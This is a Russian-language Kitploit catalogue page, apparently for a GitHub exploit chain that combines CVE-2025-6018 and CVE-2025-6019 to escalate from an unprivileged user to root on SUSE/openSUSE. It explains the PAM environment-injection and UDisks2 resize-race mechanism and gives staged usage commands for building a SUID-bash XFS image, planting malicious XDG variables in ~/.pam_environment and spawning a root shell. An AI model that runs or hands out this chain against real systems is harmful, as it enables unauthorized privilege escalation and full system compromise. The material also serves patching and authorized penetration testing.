Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Exploit-Chain-CVE-2025-6018-6019 — Эксплуатационная цепочка от CVE-2025-6018 до CVE-2025-6019 | Kitploit
Инструменты/GitHubGitHub/0rioncollector/exploit-chain-cve-2025-6018-6019
Повышение привилегийФреймворки для эксплойтовАнализ уязвимостейЭксплуатацияТестирование на ПроникновениеRed Teaming
GitHub0rioncollector/exploit-chain-cve-2025-6018-6019

Exploit-Chain-CVE-2025-6018-6019

Эксплуатационная цепочка от CVE-2025-6018 до CVE-2025-6019

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
4497 месяцев назадЕщё не проверено

https://cdn2.qualys.com/2025/06/17/suse15-pam-udisks-lpe.txt

Этот эксплойт объединяет CVE-2025-6018 и CVE-2025-6019 для повышения привилегий от непривилегированного пользователя до root на уязвимых системах SUSE/openSUSE. CVE-2025-6018 — это уязвимость внедрения переменных окружения в PAM (Pluggable Authentication Modules) в pam_env.so (версии 1.3.0–1.6.0), которая позволяет пользователям отравлять своё сессионное окружение через ~/.pam_environment с помощью директивы OVERRIDE. Манипулируя переменными сессии XDG (XDG_SEAT, XDG_VTNR, XDG_SESSION_TYPE), атакующий может обмануть systemd-logind, заставив его предоставить привилегии allow_active PolicyKit, делая удалённую SSH-сессию видимой как локальную физическую сессию. После получения статуса allow_active можно использовать CVE-2025-6019: эта уязвимость в UDisks2/libblockdev позволяет пользователям с разрешениями allow_active монтировать файловые системы с привилегированными опциями (exec, suid) через состояние гонки в методе Filesystem.Resize D-Bus. Когда операция изменения размера запускается на loop-устройстве, содержащем специально созданную файловую систему XFS с SUID-бинарём bash от root, libblockdev автоматически монтирует файловую систему для выполнения изменения размера, но из-за ошибки изменения размера не отмонтирует её, оставляя SUID bash доступным в /tmp/blockdev*/, после чего его можно выполнить для получения оболочки root.

Подробные шаги

ЭТАП 1: Создание образа XFS (атакующий/Kali)

root@kitploit:~
sudo ./ExploitChain.sh stage1 [output_path]
# Default: ./xfs.image
# Creates 300MB XFS filesystem with SUID root bash

Перенос образа на цель

root@kitploit:~
scp xfs.image user@<target_ip>:/tmp/

ЭТАП 2: Внедрение PAM (цель)

root@kitploit:~
./ExploitChain.sh stage2
# Creates ~/.pam_environment with malicious XDG variables
# MUST logout and login to trigger PAM processing

Выход и повторная аутентификация

root@kitploit:~
logout
ssh user@<target_ip>
# PAM processes ~/.pam_environment on login
# systemd-logind grants allow_active status

ЭТАП 3: Эксплойт UDisks2 (цель)

root@kitploit:~
./ExploitChain.sh stage3 /tmp/xfs.image
# Exploits UDisks2 Filesystem.Resize bug
# Mounts XFS image with SUID bash
# Spawns root shell

Автоматический режим

root@kitploit:~
# On Kali (auto-detects root and runs stage1)
sudo ./Exploit-6018-Chain-6019-v3.sh auto

# On target (auto-detects stage and runs stage2/stage3)
./ExploitChain.sh auto /tmp/xfs.image

Справка

root@kitploit:~
./ExploitChain.sh help
Скачать инструмент